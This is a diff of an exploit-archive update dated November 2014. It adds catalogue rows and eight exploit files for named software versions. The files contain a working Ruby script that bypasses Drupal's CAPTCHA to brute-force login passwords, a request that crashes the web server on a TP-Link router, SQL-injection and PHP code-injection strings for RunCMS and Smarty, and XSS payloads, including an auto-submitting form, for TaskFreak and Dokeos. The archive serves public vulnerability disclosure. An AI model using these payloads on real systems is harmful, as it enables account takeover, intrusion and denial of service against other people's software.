Updated 11_25_2014

files.csv

@@ -31824,3 +31824,11 @@ id,file,description,date,author,platform,type,port
 35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
 35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0
+35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 'register.php' SQL Injection Vulnerability",2011-02-10,"High-Tech Bridge SA",php,webapps,0
+35335,platforms/php/webapps/35335.html,"Drupal CAPTCHA Module Security Bypass Vulnerability",2011-02-11,anonymous,php,webapps,0
+35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
+35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
+35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
+35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
+35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
+35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0

platforms/hardware/webapps/35345.txt

@@ -0,0 +1,57 @@
+TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service
+
+
+Vendor: TP-LINK Technologies Co., Ltd.
+Product web page: http://www.tp-link.us
+
+Affected version:
+
+- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
+- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
+- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
+- Hardware version: WR740N v4 00000000 (v4.23)
+- Model No. TL-WR740N / TL-WR740ND
+
+Summary: The TL-WR740N is a combined wired/wireless network connection
+device integrated with internet-sharing router and 4-port switch. The
+wireless N Router is 802.11b&g compatible based on 802.11n technology
+and gives you 802.11n performance up to 150Mbps at an even more affordable
+price. Bordering on 11n and surpassing 11g speed enables high bandwidth
+consuming applications like video streaming to be more fluid.
+
+Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
+denial of service vulnerability when processing a HTTP GET request. This
+issue occurs when the web server (httpd) fails to handle a HTTP GET request
+over a given default TCP port 80. Resending the value 'new' to the 'isNew'
+parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
+crash its httpd service denying the legitimate users access to the admin
+control panel management interface. To bring back the http srv and the
+admin UI, a user must physically reboot the router.
+
+Tested on: Router Webserver
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2014-5210
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php
+
+
+13.11.2014
+
+---
+
+
+Replay
+
+GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive

platforms/php/webapps/35334.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46342/info
+
+RunCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+RunCMS 2.2.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/register.php?uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish 

platforms/php/webapps/35335.html

@@ -0,0 +1,128 @@
+source: http://www.securityfocus.com/bid/46344/info
+
+The CAPTCHA module for Drupal is prone to a security-bypass vulnerability that occurs in the CAPTCHA authentication routine.
+
+Successful exploits may allow attackers to bypass the CAPTCHA-based authentication routine, allowing attackers to perform brute-force attacks. 
+
+# Drupal Captcha bruteforcing bypass
+
+# This is a Proof Of Concept to demonstrate a logic security flow
+# in the way drupal captcha is used to protect login forms
+# from bruteforce. If the captcha challenge is solved, the next
+# login attempts can be issued without solving any new captcha challenge.
+
+# Usage: change URL, PATH, USERAGENT as you need.
+# Change cookie, captcha_sid, captcha_token, form_build_id with the values
+# you got in the html response AFTER the captcha is solved. This is needed
+# in order to issue the first request as valid.
+# Unique tokens will be then updated automatically .
+
+
+# author: Michele "antisnatchor" Orru'
+
+require "net/http"
+require "net/https"
+require "erb"
+require "singleton"
+require "rubygems"
+require "nokogiri"
+
+
+URL = 'antisnatchor.com'
+PATH = '/user'
+USERAGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'
+
+# easy to enhance this reading list from a file, but this is just a PoC
+USERNAME_LIST = ['admin']
+PASSWD_LIST = ['test1', 'test2', 'test3', 'guessme']
+
+# these are the session values needed to create valid http requests, after
+# the reCaptcha has been solved the first time, leaving the login form
+# without a new captcha challenge
+cookie = "SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;"
+captcha_sid = "476"
+form_id = "user_login"
+
+
+# these anti-XSRF tokens will change for every http response,
+# so nokogiri is used to parse the html response in order to create
+# the next http request with the valid anti-xsrf/captcha tokens.
+# These initial values will be changed accordingly and automatically
+# for each request .
+
+captcha_token = "d853d6df05f6c6a956a46f20c8fe20aa"
+form_build_id = "form-43fb0bcbcb140066a782a3fc23ab1ab7"
+
+authenticated = false;
+
+
+    @http = Net::HTTP.new(URL, 80)
+    @http.use_ssl = false
+
+     puts "+Initial xsrf token [" + form_build_id + "]"
+     puts "+Initial captcha token [" + captcha_token + "]"
+     puts "+Dictionary attack with [" + PASSWD_LIST.size.to_s + "] passwords"
+     # I'm learning ruby :-)
+     passwd_counter = 0
+
+     while !authenticated && passwd_counter < PASSWD_LIST.size do
+       puts "+Testing password [" + PASSWD_LIST[passwd_counter] + "]"
+
+       post_data = "name=" + USERNAME_LIST[0] + "&pass=" + PASSWD_LIST[passwd_counter] + "&form_build_id=" + form_build_id +
+                   "&form_id=" + form_id + "&captcha_sid="+ captcha_sid +
+                   "&captcha_token=" + captcha_token + "&op=Log+in"
+      @headers = {
+        'Cookie' => cookie,
+        'Referer' => 'http://' + URL + PATH,
+        'Content-Type' => 'application/x-www-form-urlencoded',
+        'User-Agent' => USERAGENT
+      }
+
+      puts "+Request headers = " + @headers.inspect
+
+      resp, data = @http.post2(PATH, post_data, @headers)
+
+      # loads the response in nokogiri to parse anti-XSRF tokens
+      doc = Nokogiri::HTML(data)
+      puts '+Code = ' + resp.code
+      puts '+Message = ' + resp.message
+
+
+      # "debug" code
+      #puts "=================================================== raw response START ======================================================="
+      #puts data
+      #puts "=================================================== raw response END ======================================================="
+
+      if data.index("CAPTCHA session reuse attack detected") != nil
+        puts "Doh', we've been detected by Drupal...quitting now"
+        break
+      end
+
+      if data.index("Sorry, unrecognized username or password") == nil && resp.code == "302"
+        # if credentials will be valid, there will be a 302 response with
+        # a new location header, corresponding to the user home page (http://antisnatchor.com/user/1 for instance)
+        authenticated = true
+      else
+        #parse the anti-xsrf and captcha tokens from the response
+        doc.css('input[id^=form]').each do |form_build_id|
+          form_build_id = form_build_id['id']
+          puts "+New xsrf token [" + form_build_id + "]"
+        end
+
+        doc.css('input[id^=edit-captcha-token]').each do |captcha_token_id|
+          captcha_token = captcha_token_id['value']
+          puts "+New captcha token [" + captcha_token + "]"
+        end
+
+        # I'm still learning ruby :-)
+        passwd_counter = passwd_counter + 1;
+
+      end
+      break if authenticated == true
+     end
+
+if authenticated
+  puts "+Succesfully authenticated user[" + USERNAME_LIST[0] + "] with password [" + PASSWD_LIST[passwd_counter] + "]"
+else
+  puts "+No passwords are valid for user [" + USERNAME_LIST[0] + "]. Dictionary attack failed."
+end

platforms/php/webapps/35336.txt

@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/46350/info
+
+TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. 
+
+<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>  
+
+<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">  
+
+    <input type="hidden" name="sProject" value="0" />  
+
+        <input type="hidden" name="id" value="" />  
+
+        <input type="hidden" name="mode" value="save" />  
+
+    <input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />  
+
+        <input type="hidden" name="sort" value='"><script>alert(1)</script>' />  
+
+        <input type="hidden" name="dir" value='"><script>alert(2)</script>' />  
+
+        <input type="hidden" name="show" value='"><script>alert(3)</script>' />  
+
+</form>  
+
+<a href="javascript: xss();" style="text-decoration:none">  
+
+<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>  

platforms/php/webapps/35337.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/46350/info
+ 
+TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. 
+
+http://taskfreak/print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E  
+
+http://taskfreak/print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

platforms/php/webapps/35338.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/46350/info
+  
+TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+  
+TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. 
+
+GET /taskfreak/rss.php HTTP/1.1  
+
+Referer: ">Waddup!  
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
+
+Host: localhost  
+
+Connection: Keep-alive  
+
+Accept-Encoding: gzip,deflate  
+
+Accept: */* 

platforms/php/webapps/35343.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46366/info
+
+Smarty Template Engine is prone to a remote PHP code-injection vulnerability.
+
+An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Versions prior to Smarty Template Engine 3.0.7 are vulnerable. 
+
+$smarty.template : '.(include 'hack.php').'.tpl 

platforms/php/webapps/35347.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46370/info
+
+Dokeos is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Dokeos 1.8.6.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0)